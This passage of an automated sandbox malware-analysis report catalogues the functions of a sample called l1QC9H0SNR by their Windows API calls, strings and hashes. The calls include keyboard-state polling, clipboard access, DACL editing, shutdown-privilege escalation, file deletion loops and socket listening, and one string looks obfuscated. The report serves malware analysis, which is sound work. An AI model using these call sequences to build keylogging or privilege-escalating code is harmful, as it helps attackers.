                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                              • Instruction ID: 13a97df6b35d0823ca46f21199c4ada0b3f37d3a1da10626d1225ba958db950d
                                              • Opcode Fuzzy Hash: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                              • Instruction Fuzzy Hash: 3131E23650121B6BCB10AFA4EC59AFEB7ECDF45320F1041F2F854A30A0EB70DA45CA54
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBA20F
                                              • __swprintf.LIBCMT ref: 00BBA231
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BBA26E
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BBA293
                                              • _memset.LIBCMT ref: 00BBA2B2
                                              • _wcsncpy.LIBCMT ref: 00BBA2EE
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BBA323
                                              • CloseHandle.KERNEL32(00000000), ref: 00BBA32E
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00BBA337
                                              • CloseHandle.KERNEL32(00000000), ref: 00BBA341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                              • Instruction ID: 5881a857165c9c2d676ab1b8df6849869d6cc461bd6ac88012b660934d0f8c50
                                              • Opcode Fuzzy Hash: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                              • Instruction Fuzzy Hash: 8D318DB190410AABDB219FA4DC49FFB77FCEF89740F1041B6F509D2160EBB096448B29
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BDC1FC
                                              • GetFocus.USER32 ref: 00BDC20C
                                              • GetDlgCtrlID.USER32(00000000), ref: 00BDC217
                                              • _memset.LIBCMT ref: 00BDC342
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BDC36D
                                              • GetMenuItemCount.USER32(?), ref: 00BDC38D
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BDC3A0
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BDC3D4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BDC41C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BDC454
                                              • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00BDC489
                                              Strings
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 3616455698-4108050209
                                              • Opcode ID: c35759f9f107af774dccee746c5b58c1471b76e718939d153b21b0b032e38dc3
                                              • Instruction ID: 31e855e6206381a086eb85d674d5f8127d07a258baedea12ad1a081a48ec62b8
                                              • Opcode Fuzzy Hash: c35759f9f107af774dccee746c5b58c1471b76e718939d153b21b0b032e38dc3
                                              • Instruction Fuzzy Hash: D6817B706093029FDB14CF14D894ABABBE8FF89714F0049AEF99597391EB30D905CB92
                                              APIs
                                                • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                                • Part of subcall function 00BA8202: GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                                • Part of subcall function 00BA8202: GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                                • Part of subcall function 00BA8202: RtlAllocateHeap.NTDLL(00000000,?,00BA7CE2), ref: 00BA823E
                                                • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                • Part of subcall function 00BA829F: GetProcessHeap.KERNEL32(00000008,00BA7CF8,00000000,00000000,?,00BA7CF8,?), ref: 00BA82AB
                                                • Part of subcall function 00BA829F: RtlAllocateHeap.NTDLL(00000000,?,00BA7CF8), ref: 00BA82B2
                                                • Part of subcall function 00BA829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BA7CF8,?), ref: 00BA82C3
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA7D13
                                              • _memset.LIBCMT ref: 00BA7D28
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA7D47
                                              • GetLengthSid.ADVAPI32(?), ref: 00BA7D58
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00BA7D95
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA7DB1
                                              • GetLengthSid.ADVAPI32(?), ref: 00BA7DCE
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BA7DDD
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BA7DE4
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA7E05
                                              • CopySid.ADVAPI32(00000000), ref: 00BA7E0C
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA7E3D
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA7E63
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA7E77
                                              Similarity
                                              • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 2347767575-0
                                              • Opcode ID: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                              • Instruction ID: da5246be21fb1aba21ec7440df51b5ee381ee08e5a8c80437e71a80610424ce0
                                              • Opcode Fuzzy Hash: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                              • Instruction Fuzzy Hash: 46611E7190820AAFDF109FA5DC95ABEBBB9FF05300F0481AAE915A7251DB319A05CB60
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 0-3457523301
                                              • Opcode ID: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                              • Instruction ID: 84a8ee8aa1c8e43305f77563b0fe57bb20a7b475170dc2fca9f2c872b165a24e
                                              • Opcode Fuzzy Hash: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                              • Instruction Fuzzy Hash: 58726D71E04219DBDF64CF59C8807AEB7F5FF49310F1485AAE849EB291EB349981CB90
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00BB0097
                                              • SetKeyboardState.USER32(?), ref: 00BB0102
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00BB0122
                                              • GetKeyState.USER32(000000A0), ref: 00BB0139
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00BB0168
                                              • GetKeyState.USER32(000000A1), ref: 00BB0179
                                              • GetAsyncKeyState.USER32(00000011), ref: 00BB01A5
                                              • GetKeyState.USER32(00000011), ref: 00BB01B3
                                              • GetAsyncKeyState.USER32(00000012), ref: 00BB01DC
                                              • GetKeyState.USER32(00000012), ref: 00BB01EA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00BB0213
                                              • GetKeyState.USER32(0000005B), ref: 00BB0221
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                              • Instruction ID: 9ac8b69e79fa9050fca53a48fb46d632d329b64a082fa2d3a9063ef13bd1ae64
                                              • Opcode Fuzzy Hash: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                              • Instruction Fuzzy Hash: 4651B4209157882BFB35FBA488547FBBFF4DF11380F4845DA99C2561C2EAE49A8CC761
                                              APIs
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD04AC
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BD054B
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BD05E3
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BD0822
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD082F
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: fb1dcebe41d3f290cc017971277db67be779a551c929586f21024e552e093667
                                              • Instruction ID: 13fd8f1d7e294898f81d35aee0c39ad15f295d17b151571c49da70359717f208
                                              • Opcode Fuzzy Hash: fb1dcebe41d3f290cc017971277db67be779a551c929586f21024e552e093667
                                              • Instruction Fuzzy Hash: F4E14F71604205AFCB14EF24C895E6ABBE4FF89714F0485ADF84ADB361DA31ED05CB52
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CoInitialize.OLE32 ref: 00BC8403
                                              • CoUninitialize.COMBASE ref: 00BC840E
                                              • CoCreateInstance.COMBASE(?,00000000,00000017,00BE2BEC,?), ref: 00BC846E
                                              • IIDFromString.COMBASE(?,?), ref: 00BC84E1
                                              • VariantInit.OLEAUT32(?), ref: 00BC857B
                                              • VariantClear.OLEAUT32(?), ref: 00BC85DC
                                              Strings
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 7e183c18f8552ef990f7241c9bf28a4df1d6359a9af1346aa7382ef4865233e5
                                              • Instruction ID: 0a915e8be267b752a2eacfb08a3b77c3d863ad8e05e4b83acbf5ab526cb30b90
                                              • Opcode Fuzzy Hash: 7e183c18f8552ef990f7241c9bf28a4df1d6359a9af1346aa7382ef4865233e5
                                              • Instruction Fuzzy Hash: 53618970608312AFC714DF64C889F6AB7E8AF49754F04489DF9869B291DB70ED48CB92
                                              APIs
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                              • Instruction ID: dad28a48c56a6702af1b9da038ba772170d9931429192221b6f6606a6cf39fc1
                                              • Opcode Fuzzy Hash: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                              • Instruction Fuzzy Hash: 89218D352052119FDB10AF24DC69F6EBBE8EF55751F1480AAF9469B2A1EB30ED00CB54
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BB38A3
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BB394B
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB395E
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BB397B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB399D
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BB39B9
                                              Strings
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 0d7995ebc6b6d3d84bae7a006fdfefa94848e13cfa22e6fdbbe727ddc07f188f
                                              • Instruction ID: 03b29317e2158dfe91649dd163af7becab5e3952c603261418037b120a5a9c02
                                              • Opcode Fuzzy Hash: 0d7995ebc6b6d3d84bae7a006fdfefa94848e13cfa22e6fdbbe727ddc07f188f
                                              • Instruction Fuzzy Hash: 43516D3190514DABCB11EBA0D992AFDB7F9AF15301F6000E9E846771A1EFA16F0DCB61
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BBF440
                                              • Sleep.KERNEL32(0000000A), ref: 00BBF470
                                              • _wcscmp.LIBCMT ref: 00BBF484
                                              • _wcscmp.LIBCMT ref: 00BBF49F
                                              • FindNextFileW.KERNEL32(?,?), ref: 00BBF53D
                                              • FindClose.KERNEL32(00000000), ref: 00BBF553
                                              Strings
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 26deae6f3979ea7bfd3486e06ab12012c0fdcd9ca8a68eaeea0c2f99851e02f2
                                              • Instruction ID: 39e7682a34cf8e2dd4a0fbd717266b625db8158353a298b8e5de050756c024ff
                                              • Opcode Fuzzy Hash: 26deae6f3979ea7bfd3486e06ab12012c0fdcd9ca8a68eaeea0c2f99851e02f2
                                              • Instruction Fuzzy Hash: 45417C7190421AAFCF24EF64DC55AFEBBF4FF15310F1444A6E815A32A0EB709A58CB50
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BDD47C
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BDD49C
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BDD6D7
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDD6F5
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDD716
                                              • ShowWindow.USER32(00000003,00000000), ref: 00BDD735
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BDD75A
                                              • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00BDD77D
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                              • String ID:
                                              • API String ID: 830902736-0
                                              • Opcode ID: 9cb10c453b93d60f85c939344dec9c44de00bde786c135aa0a86a61646b3bc4b
                                              • Instruction ID: 3721af3fac14309b46839b6c91a9b704ef0eef80e718fb9bb4ebb757aedede5b
                                              • Opcode Fuzzy Hash: 9cb10c453b93d60f85c939344dec9c44de00bde786c135aa0a86a61646b3bc4b
                                              • Instruction Fuzzy Hash: 0AB16A75600216EBDF14CF68C9D57ADBBF1FF04701F0880AAEC899B295E734A950CB90
                                              APIs
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: c992042c6075735170802f0c0b0665100bd4c0e0efc6d494be00fe29dea6d0b4
                                              • Instruction ID: 7e8cfcc25bf7b14118c29c2f057160f94d2a41a0679701a500d877631038095e
                                              • Opcode Fuzzy Hash: c992042c6075735170802f0c0b0665100bd4c0e0efc6d494be00fe29dea6d0b4
                                              • Instruction Fuzzy Hash: 75128A70A04609DFDF14DFA5D981AAEB7F5FF48300F1085A9E806A7291EB39AD24CB50
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BB3B89
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BB3BD9
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB3BEA
                                              • FindClose.KERNEL32(00000000), ref: 00BB3C01
                                              • FindClose.KERNEL32(00000000), ref: 00BB3C0A
                                              Strings
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: 0fa1309a7a14d8a6fd8d4d1fd807326bb4be4ebb6df74fffd497a7275de4b0be
                                              • Instruction ID: 1fa729681ff33cb531da707f29e828240684d264959c0e2476244a0a3ffa2f4c
                                              • Opcode Fuzzy Hash: 0fa1309a7a14d8a6fd8d4d1fd807326bb4be4ebb6df74fffd497a7275de4b0be
                                              • Instruction Fuzzy Hash: A2317E310493859FC201EB64D8A19FFBBE8AE91315F404EADF8D5931A1EF219A0DC763
                                              APIs
                                                • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00BB51F9
                                              Strings
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                              • Instruction ID: 5e8e2cb78a9abf6a0d26c51efe020c5d271d9bd2741385e7479ee4e63180f73d
                                              • Opcode Fuzzy Hash: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                              • Instruction Fuzzy Hash: E401F731697A166FE7386668AC9BFFAB3D8DB05740F2404A1F943E20D2EAD11C0085A2
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BC62DC
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC62EB
                                              • bind.WS2_32(00000000,?,00000010), ref: 00BC6307
                                              • listen.WS2_32(00000000,00000005), ref: 00BC6316
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC6330
                                              • closesocket.WS2_32(00000000), ref: 00BC6344
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                              • Instruction ID: cd9eb14f05561dbbac1bdf68547023fbed6bc53886879386fbc3858c1662b4b3
                                              • Opcode Fuzzy Hash: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                              • Instruction Fuzzy Hash: 78219E756002059FCB10EF68C885F7EB7E9EF89721F1481A9E816A72D1DB70AD05CB51
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • _memmove.LIBCMT ref: 00BA0258
                                              • _memmove.LIBCMT ref: 00BA036D
                                              • _memmove.LIBCMT ref: 00BA0414
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 347cbc563faa6f3a392cbfdac8ea53850e0a6220e573557037d094f9439579b8
                                              • Instruction ID: 8cf37b27674f3578ca0768e48c20b5b96a662a3f9aa7198e547ab7b9d896aee8
                                              • Opcode Fuzzy Hash: 347cbc563faa6f3a392cbfdac8ea53850e0a6220e573557037d094f9439579b8
                                              • Instruction Fuzzy Hash: AE02C0B0A14209DBCF14EF64D981AAE7BF5EF49300F5480E9E80AEB251EB35DD54CB91
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00B519FA
                                              • GetSysColor.USER32(0000000F), ref: 00B51A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 00B51A61
                                                • Part of subcall function 00B51290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00B512D8
                                              Similarity
                                              • API ID: ColorDialogNtdllProc_$LongWindow
                                              • String ID:
                                              • API String ID: 591255283-0
                                              • Opcode ID: b9055c05166d6134fa5a5984209f1e3b42b429913d59fc2ba1f7bff097fb176b
                                              • Instruction ID: a8dbffa92dc4e20053c4bf2f93b435cb6efddee5e006149c2e21d51a0fa49199
                                              • Opcode Fuzzy Hash: b9055c05166d6134fa5a5984209f1e3b42b429913d59fc2ba1f7bff097fb176b
                                              • Instruction Fuzzy Hash: B2A15A75106585BAEA2AAB3C8C94FBF25DCDB42343B1409DAFD12D21E2DA249D09D3B1
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBBCE6
                                              • _wcscmp.LIBCMT ref: 00BBBD16
                                              • _wcscmp.LIBCMT ref: 00BBBD2B
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBBD3C
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BBBD6C
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: 3cba8e21fe3fb310a948c5fd9b276975633564cd4d1a37726d00f53a3a75ce4f
                                              • Instruction ID: 29fd0b929763af90461c4086537925d2bd0f1c4e3f50598b3c7a7c9eb7c22650
                                              • Opcode Fuzzy Hash: 3cba8e21fe3fb310a948c5fd9b276975633564cd4d1a37726d00f53a3a75ce4f
                                              • Instruction Fuzzy Hash: 22516E356046029FC714DF68D491EAAB3E4EF49320F1446AEF966873A1DBB4ED04CB91
                                              APIs
                                                • Part of subcall function 00BC7D8B: inet_addr.WS2_32(00000000), ref: 00BC7DB6
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00BC679E
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC67C7
                                              • bind.WS2_32(00000000,?,00000010), ref: 00BC6800
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC680D
                                              • closesocket.WS2_32(00000000), ref: 00BC6821
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                              • Instruction ID: a224b9ecef3d0374be4b2c3a4b5abf5c287ad34550c02198098cd513e0ef4f91
                                              • Opcode Fuzzy Hash: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                              • Instruction Fuzzy Hash: 5D419D75A00210AFEB10BF248C86F6E77E89B45755F0484EDFD1AAB2D2DA709D048B91
                                              APIs
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                              • Instruction ID: 6ff9671fe07c395d85a2638f7208fa9c9b8dd593bc5a55e2524b0e29aee8282e
                                              • Opcode Fuzzy Hash: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                              • Instruction Fuzzy Hash: B911D0317019116BEB306F269C44B6AFBD8EF443A1B0040AAE847D7341EB70DD018AA8
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00BA80E0
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                              • Instruction ID: 6e240d5f171be7ceaf8789f93b3591090b795dd8bc73ecac4ea9c0e2fc98d23f
                                              • Opcode Fuzzy Hash: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                              • Instruction Fuzzy Hash: 37F0C230209206BFEB100FA4EC8DE777BBCEF4A754B000026F906D3150DF609D01DA60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf
